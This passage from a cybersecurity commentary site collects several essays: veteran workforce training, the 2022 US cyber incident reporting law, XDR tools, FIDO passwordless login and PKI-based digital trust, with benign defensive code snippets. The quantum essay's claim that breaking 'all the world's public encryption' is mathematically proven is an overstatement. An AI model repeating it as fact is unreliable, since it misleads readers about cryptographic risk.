This experience can also be helpful when training cybersecurity talent. One example is a training program led by a veteran who once trained military members to prepare for combat. After many years and roles in his civilian life as a cybersecurity professional, he now leads (and built) the entire cybersecurity upskilling and training program for a large government contractor.

Arguably, one of the most critical changes needed will be to adapt hiring practices to help candidates without a traditional college education enter into these critical roles. Stringent job requirements for entry-level cybersecurity positions are some of the biggest hurdles facing those trying to break in — especially veterans who won’t be applying with a traditional college degree or the corporate experience often required.

Loosening these restrictions has been shown to work. A recent survey from Infosec revealed that hiring managers successfully filling cybersecurity roles were considering more inexperienced candidates, actively recruiting diverse candidates and emphasizing attributes like leadership skills, certifications, and communication skills.

Beyond lowering these barriers to entry, a key to placing these individuals in cybersecurity roles is forming partnerships that facilitate hands-on training, certifications, apprenticeships, mentorships and industry connections to help veterans land their first cyber job. And it works.

One student who took a free Security+ Training Boot Camp with Infosec and VetsinTech recently landed a security engineer job at Caterpillar, nearly doubling the salary from their previous civilian role as a scientist. Another is using their cybersecurity training, received as part of a veterans scholarship, to advance their career as a law enforcement detective and spearhead the department’s first dedicated cybercrime unit.

These stories show that partnerships among government, private and public organizations are essential to guide veterans into cybersecurity roles with the training, certifications, professional connections and opportunities they need to break into the industry.

Many government and non-profit organizations like VetJobs and VetsinTech are doing just this. They provide free cybersecurity training and career development opportunities to transitioning service members, veterans, national guardsmen, reservists and military spouses.

As a security training provider, Infosec has formed partnerships with both of these organizations to provide hands-on certification training to veterans. No matter your organization’s size or type, I encourage you to reach out to them and see how your organization can collaborate to fill these gaps.

To stay ahead of the ever-changing landscape of cyber threats, we must think differently about hiring and training talent. After veterans break into our industry, they often serve as some of the most invaluable cybersecurity employees and leaders.

This is a call to upskill our country’s veterans into the cybersecurity roles we so desperately need.

About the essayist: Jack Koziol is the founder, SVP and GM of Infosec Institute, a cybersecurity education company. He is the author of The Shellcoder’s Handbook. When he’s not keeping the world safe by helping organizations educate their employees, he tries to get his three children to eat their breakfast and get to school on time.

In today’s times, we are more aware of cyberattacks as these have become front-page news. We most recently witnessed this as Russia invaded Ukraine. Cyberattacks were used as the first salvo before any bullet or missile was fired.

Related: The role of post-quantum encryption

We live in an increasingly digitized world where digital footprints are left behind, leaving evidence of nearly everything we do. This enables our adversaries to gain extremely valuable information and to steal, disrupt or even harm with simple keystrokes on a distant computer.

Quantum computers pose yet another looming threat since it has been mathematically proven that quantum computers with enough power will crack all the world’s public encryption. When these computers come online, any company or federal agency that is not upgraded to post-quantum cybersecurity will leave its data vulnerable to attackers. Even worse, data that is being stolen today is sitting on servers in other countries waiting to be decrypted by quantum computers.

Why Now?

It is now more important than ever for companies to share cyberattack and ransomware data with the government to ensure that we can defend and prepare much better than before.

On March 15, 2022, a new bipartisan cyber incident reporting law, the “Cyber Incident Reporting for Critical Infrastructure Act,” was passed by Congress and signed by President Joe Biden. It requires critical infrastructure leaders in commercial enterprises and government to report cyber incidents to the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA).

Ransomware payments must be reported within 24 hours, and all cyber incidents must be declared within 72 hours. The reporting requirements, however, will not become effective until CISA provides rules and guidelines for entities that incur cyber incidents. CISA still needs to define which entities are required to report, and when cyber incidents qualify for reporting.

According to Michigan Senator Gary Peters, chair of the Senate Homeland Security Committee, “This provision will create the first holistic requirement for critical infrastructure operators to report cyber incidents so the federal government can warn others of the threat, prepare for widespread impacts, and help get our nation’s most essential systems back online so they can continue providing invaluable services to the American people.”

At this point, companies and agencies that could be required to report fall under Presidential Policy Directive 21, which covers these critical infrastructure sectors: financial services, food and agriculture, government facilities, dams, critical manufacturing, communications, chemical, commercial facilities, defense industrial base, emergency services, energy, healthcare and public health, information technology, nuclear reactors, materials and waste, transportation systems, and water systems.

The bill defines a cyber incident as “an occurrence that actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information on an information system, or actually or imminently jeopardizes, without lawful authority, an information system.”

Privacy is a concern

Any agency required to report cyber incidents can face shareholder and consumer backlash, and thus many have been hesitant to report breaches. We have seen in the past how many cyber incidents have gone unreported as large brands and agencies try to prevent a degradation of trust. However, in the case of this bill, there are protections designed to mitigate problems arising from reporting cyber and ransomware incidents. A partial list of the protections includes:

•CISA will anonymize the reporting entity

•All of the reported information will remain proprietary to the reporting entity if so desired

•Reports cannot be used in enforcement or regulatory actions against reporting entities

Some experts worry that inflexible and inaccurate requirements or expertise/staff shortages could cause confusion and do more harm than good. As with any great plan, success lies in the efficacious execution of tasks to ensure an optimal outcome. However, the tradeoff is that we will have a chance at understanding how our adversaries are targeting government agencies and commercial entities, as well as other critical infrastructure groups, with cyberattacks. If the information flow is timely and accurate, it will allow other entities to protect themselves prior to experiencing an already known but not widely distributed cyberattack type.

Sharing attack intel

This bill was considered urgent by government leaders because our commercial enterprises, federal agencies and suppliers of critical infrastructure have seen increased cyberattacks and ransomware breaches that dramatically affected our nation’s energy and food supplies, while disabling some schools. For example, in 2021 Colonial Pipeline was hacked, and the company decided to pay roughly $4.4 million in ransom since most of the East Coast’s fuel supply was shut down.

Panicked East Coast Americans began hoarding gas due to a major disruption in fuel supply. The company did not notify the federal government about the ransomware attack until well after it happened.

Many cyber and ransomware breaches currently go unreported because they create reputational problems for companies and government agencies. After all, who wants to report that they had a breach which has caused critical data or operational losses? For commercial enterprises, this can lead to lawsuits, decreased shareholder value, and a lack of confidence in the brand. For government agencies, leaders must admit cybersecurity failures.

However, if commercial, government and critical infrastructure entities can share information it will help all of us to quickly learn and prepare for such attacks. And, if information about cyber breaches and ransomware attacks is shared quickly enough, we can provide warning to our nation’s largest and most important companies and federal agencies which could mitigate further damage. This is even more urgent as quantum computers will increase our risk of critical infrastructure disruption or failure.

About the essayist: Skip Sanzeri is COO of QuSecure, supplier of QuProtect™, a state-of-the-art, software-based quantum security solution.

According to recent data from Oracle and KPMG, organizations today employ over 100 cybersecurity products to secure their environments. These products play essential roles in detecting and preventing threats.

Related: Taking a ‘risk-base’ approach to security compliance

However, because they generate thousands of alerts every day, this vast sprawl of security sources adds even more work to already over-stretched security teams. It could create a cybersecurity ticking time bomb.

Many organizations have recently undertaken rapid digital transformations in response to the ongoing pandemic and a societal shift toward a “work from anywhere” future. This hybrid model has created exciting opportunities for employees and organizations and significantly raised the security stakes.

Most combine the cloud, Office 365, and Active Directory to store and transfer sensitive corporate data, and they need security solutions to protect their entire environment as it grows and evolves. The once “protective perimeter” surrounding enterprise IT has dissolved, transforming it from a closed environment into one that spans far and wide with copious entry points.

To address this security challenge, organizations are deploying more security products today. This seems to be creating new problems in vendor sprawl, further burdening security teams with more to do. The challenge is that disparate vendors do not represent data in the same way, so there is no correlation between dashboards and metrics.

When organizations have two or three security platforms protecting their environment, security teams must toggle between them and make sense of disparate data sets. This often results in a lack of clarity, inhibiting them from seeing the big picture of what is really happening in their security environment. This is why cyber gangs tend to favor layered attacks. They’re harder to identify across disparate security data sets.

All security technologies have their own alerting systems, requirements for patches and updates, integration needs, user nuances, policy management processes, access control, reporting, etc. This can become overwhelming for security teams, often understaffed and under-resourced, resulting in missed alerts – some insignificant, but others critical.

Too many tools, too little time

So, how best to overcome this challenge? As organizations’ environments continue expanding, how best to improve security across the entire infrastructure without creating vendor sprawl or overburdening security teams?

One tool picking up prominence is Extended Detection and Response (XDR).

XDR is one of the latest acronyms to hit the cyber dictionary, and it is a new approach to threat detection and response. It provides holistic protection against cyberattacks across an organization’s entire digital estate, including endpoints, applications, networks, and cloud environments.

While the tool is often confused with Managed Detection and Response (MDR), Security Information and Event Management (SIEM), and Endpoint Detection and Response (EDR), it is very different as it builds upon each offering, rolling them into a single package to help organizations better secure their environments as digital transformation accelerates.

While EDR, MDR, and SIEM provide visibility into specific areas, by choosing just one, organizations are not necessarily improving their overall security posture against potential attack vectors because visibility is still limited to only the area that the solution is monitoring.

With EDR, the solution only looks for threats or security issues impacting organizations’ endpoints. Historically, when organizations’ primary attack vectors were PCs, this would have provided adequate security. However, attacks target multiple different sources today, so threat hunting and protection must secure everything.

XDR meets evolving security needs

Rather than deploying multiple tools from multiple security vendors, XDR combines endpoint, network, applications, and cloud architecture monitoring and response capabilities into one platform, allowing better correlation of security events and freeing security teams from vendor sprawl. With cyberattacks growing year-on-year, organizations simply do not have the manpower or resources to combat threats.

To bridge the gap, holes are plugged with new security products. While these are beneficial in threat detection, most products are from different vendors, which means there is no unified way to receive alerts. This results in strained security teams wasting time navigating through the mechanics of each security tool.

One of the best ways to overcome this issue is through XDR technology, the next evolution in threat detection and response. XDR’s capabilities protect organizations’ entire digital estates as they grow beyond the safety of its perimeter.

XDR can consolidate multiple toolsets and alerting systems into a single, integrated solution and provide rapid response against threats targeting all organizational infrastructure. Security teams can then identify and investigate alerts quickly from a single source, without being overburdened, before threats can harm the business.
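
To make “correlation” concrete: the core move is normalizing alerts from disparate tools into one schema and grouping them by the entity they touch, so three disconnected alerts surface as one incident. A deliberately simplified Python sketch, with invented tool names and fields:

```python
# Deliberately simplified XDR-style correlation: normalize alerts from
# endpoint, network and cloud tools into one schema, then group by entity.
from collections import defaultdict

raw_alerts = [
    {"source": "edr",   "entity": "laptop-042", "signal": "suspicious process"},
    {"source": "ndr",   "entity": "laptop-042", "signal": "beaconing to rare domain"},
    {"source": "cloud", "entity": "laptop-042", "signal": "impossible-travel login"},
    {"source": "edr",   "entity": "srv-db-01",  "signal": "outdated agent"},
]

incidents = defaultdict(list)
for alert in raw_alerts:
    incidents[alert["entity"]].append(f"{alert['source']}: {alert['signal']}")

for entity, signals in incidents.items():
    if len(signals) > 1:  # multiple layers firing on one entity
        print(f"INCIDENT on {entity}:", "; ".join(signals))
```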

About the essayist: Christian Espinosa is the managing director of Cerberus Sentinel, a Managed Compliance and Cybersecurity Provider (MCCP) with its exclusive MCCP+ managed compliance and cybersecurity services plus culture program. He is also the best-selling author of “The Smartest Person in the Room.” Espinosa came to Cerberus Sentinel after the company acquired Alpine Security, a cybersecurity consulting and managed services company he founded. He has also been a white hat hacker and a certified high-performance coach.

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidently, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post-Covid-19, have never been more motivated to adopt a new authentication paradigm – one that eliminates shared secrets.

Password abuse at scale arose shortly after the decision got made in the 1990s to make shared secrets the basis for securing digital connections. Fortifications, such as multi-factor authentication (MFA) and password managers, proved to be mere speed bumps. Threat actors now routinely bypass these second-layer security gates.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords,” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios

Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR Code.

He or she simply uses his or her smartphone to scan the QR code. A phone app then uses the onboard biometric sensor, either fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.

Talk about turning Bring Your Own Device security concerns on their head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a fresh set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services.
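To make that concrete, here is a hedged sketch of the enrollment side, using the WebAuthn browser API through which FIDO2 reaches web applications; the relying-party and user details are placeholders, not any vendor’s actual configuration:

    // Hypothetical FIDO2/WebAuthn enrollment (registration) ceremony.
    async function enroll(challenge: Uint8Array, userId: Uint8Array) {
      const credential = await navigator.credentials.create({
        publicKey: {
          challenge, // random bytes issued by the server
          rp: { name: "Example Corp", id: "example.com" }, // placeholder relying party
          user: { id: userId, name: "alice@example.com", displayName: "Alice" },
          pubKeyCredParams: [{ type: "public-key", alg: -7 }], // ES256
          authenticatorSelection: { userVerification: "required" },
        },
      });
      // The server stores only the credential's public key; the private
      // key never leaves the authenticator.
      return credential;
    }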

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald “eliminating the vulnerability of passwords,” to tout “making passwordless part of consumer lives” and to promise “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving the station and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually exhibits when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a fairer distribution of wealth, such as the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

Modern digital systems simply could not exist without trusted operations, processes and connections. They require integrity, authentication, trusted identity and encryption.

Related: Leveraging PKI to advance electronic signatures

It used to be that trusting the connection between a workstation and a mainframe computer was the main concern. Then the Internet took off and trusting the connection between a user’s device and a web server became of paramount importance.

Today we’re in the throes of digital transformation. Software-defined-everything is the order of the day. Our smart buildings, smart transportation systems and smart online services are all network-connected at multiple levels. Digital services get delivered across a complex amalgam of public cloud, hybrid cloud and on-premises digital systems.

It is against this backdrop that digital trust has become paramount. We simply must attain — and sustain — a high bar of confidence in the computing devices, software applications and data that make up the interconnected world we occupy.

And yet at this moment, digital trust isn’t where it needs to be on the boardroom priority list or in the IT security team’s strategy. It remains all too common for threat actors to subvert connected ecosystems. This challenge has not escaped the global cybersecurity community. Largely out of the public’s eye, technologists from the private and public sectors are fully engaged in shaping the elements of digital trust that will safeguard our connected future.

Protocols and policies setting new parameters for trusted connections are being hammered out, and advanced encryption, authentication and data protection solutions are being ramped up.

Failure is not an option. These efforts must result in a level of digital trust significantly higher than we have today if we are to have full confidence in digital services, going forward.

This was the main topic of discussion recently at DigiCert Security Summit 2022. I had the chance to talk about DigiCert’s perspective with Jason Sabin, DigiCert’s Chief Technology Officer.

We discussed why elevating digital trust has become so vital. Here are a few key takeaways.

Trust under siege

Long gone are the days when a security team mainly had to be concerned about network connections getting made internally, on company-owned equipment, or externally, across a VPN connection or a public-facing webpage.

Today, software developers are king and agile software is their golden chalice. Developers stitch together modular microservices and software containers that tap into far-flung software-defined resources. This results in ephemeral connections firing off at a vast scale — humans-to-software and software-to-software — all across the Internet and the cloud.

Trust is under siege. The challenge faced by a security team is to verify the authenticity of each connection and preserve the encryption, as needed, across a massive, sprawling attack surface.

And this is where digital trust comes in, with core implementations such as public key infrastructure (PKI), Sabin noted. PKI is the framework by which digital certificates get issued to authenticate the identity of users and devices, and it is also the plumbing for encrypting data that moves across the public Internet.

Most folks come into contact with the most visible subset of PKI — the TLS/SSL/HTTPS authentication and encryption protocol — each time they connect to a secured website.
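That visible subset is easy to inspect for yourself. Here’s a minimal TypeScript sketch, using Node.js’s built-in tls module, that opens a connection and prints the certificate a server presents; example.com is just a stand-in host:

    import tls from "node:tls";

    // Connect to a stand-in host and inspect the certificate that
    // anchors the TLS/HTTPS session.
    const socket = tls.connect(
      { host: "example.com", port: 443, servername: "example.com" },
      () => {
        const cert = socket.getPeerCertificate();
        console.log("Subject:   ", cert.subject);
        console.log("Issuer:    ", cert.issuer);
        console.log("Expires:   ", cert.valid_to);
        // true only if the chain validated against trusted CAs
        console.log("Authorized:", socket.authorized);
        socket.end();
      }
    );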

However, PKI has engrained itself much more pervasively than that across the digital landscape. Over the past decade or so, companies have turned to using PKI to certify and secure many types of digital connections inside their private networks, as well.

Consider that just five years ago, a large enterprise was typically responsible for managing tens of thousands of digital certificates. Today that number for many organizations is pushing a million or more digital certificates, as digital transformation accelerates.

“There’s a massive shift unfolding very, very quickly,” Sabin told me.  “Trust has become the backbone of security and, as a result, companies are leveraging PKI technology to implement trust in all parts of their ecosystem, which basically comes down to issuing and managing a lot of digital certificates.”
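Managing certificates at that scale is, above all, an automation problem. As one illustration — and not a depiction of DigiCert’s actual tooling — a monitoring script might parse each certificate in an inventory and flag the ones nearing expiry; the file path here is hypothetical:

    import { X509Certificate } from "node:crypto";
    import { readFileSync } from "node:fs";

    // Parse one PEM-encoded certificate (hypothetical path) and flag it
    // if it expires within 30 days -- the kind of check that must run
    // across an inventory of a million certificates.
    const pem = readFileSync("certs/api-gateway.pem", "utf8");
    const cert = new X509Certificate(pem);
    const daysLeft = Math.floor(
      (new Date(cert.validTo).getTime() - Date.now()) / 86_400_000
    );
    if (daysLeft < 30) {
      console.warn(`${cert.subject} expires in ${daysLeft} days -- renew now`);
    }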

Protocols, policies and PKI

The question then becomes: Is PKI robust enough to support the elevated level of digital trust that’s needed?

DigiCert and other security experts essentially argue that the answer is yes: PKI is ubiquitous, time-tested and well-suited to leveraging automation. It can form the foundation of a larger digital trust strategy.

DigiCert, for instance, supplies advanced PKI management systems that can authenticate the identity of an individual, a business, a machine, a workload, a software container or a microservice. And automation already is being leveraged to assure that an object hasn’t been tampered with, as well as ensure the encryption of data in transit – at scale.
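Verifying that an object hasn’t been tampered with generally comes down to checking a digital signature over it. Here is a minimal sketch of such an automated check, assuming an Ed25519 signing key and hypothetical file names rather than any particular vendor’s pipeline:

    import { createPublicKey, verify } from "node:crypto";
    import { readFileSync } from "node:fs";

    // Hypothetical artifact, detached signature and signer public key.
    const artifact = readFileSync("build/app-image.bin");
    const signature = readFileSync("build/app-image.sig");
    const publicKey = createPublicKey(readFileSync("keys/signer-pub.pem", "utf8"));

    // For Ed25519 keys, Node infers the digest, so the algorithm is null.
    const intact = verify(null, artifact, publicKey, signature);
    console.log(intact ? "Artifact verified" : "Tampering detected");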

Advanced data security technologies, no matter how terrific, are just one piece of the puzzle. The security experts and thought leaders at DigiCert’s conference discussed the progress being made on a couple of other fronts: protocols and policies.

In order to achieve the level of digital trust needed to support great leaps forward, a fresh set of technical protocols, compliance benchmarks and supporting audits remains to be finalized and implemented.

The model for driving consensus of this sort was laid out by the industry forums and consortiums that convened to give us the protocols and policies undergirding the public Internet. Many of these same groups remain active; the CA/Browser Forum, for instance, which focuses on benchmarks for digital certificates, is actively hashing out new rules of the road.

Sabin

“We have to think about how to extend trust to mobile devices and to IoT devices, and how to more effectively protect supply chains and critical infrastructure,” Sabin says. “We also must find ways to encourage high levels of compliance with industry standards and government regulations. This is all part of building trusted digital ecosystems.”

Everyone should realize what’s at stake here: smarter buildings, autonomous transportation systems, climate change remediation, medical breakthroughs.

As people spend larger chunks of their waking hours online, the boundary between personal and work connectivity has become fluid. Companies need to come to view digital trust as a strategic imperative.

This challenge speaks to verifying the integrity of homegrown and third-party software builds, the firmware on connected devices and their trusted access, the trustworthiness of documents and much more, Sabin says.

I agree.  And I’m encouraged that the work of prioritizing digital trust is well underway. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)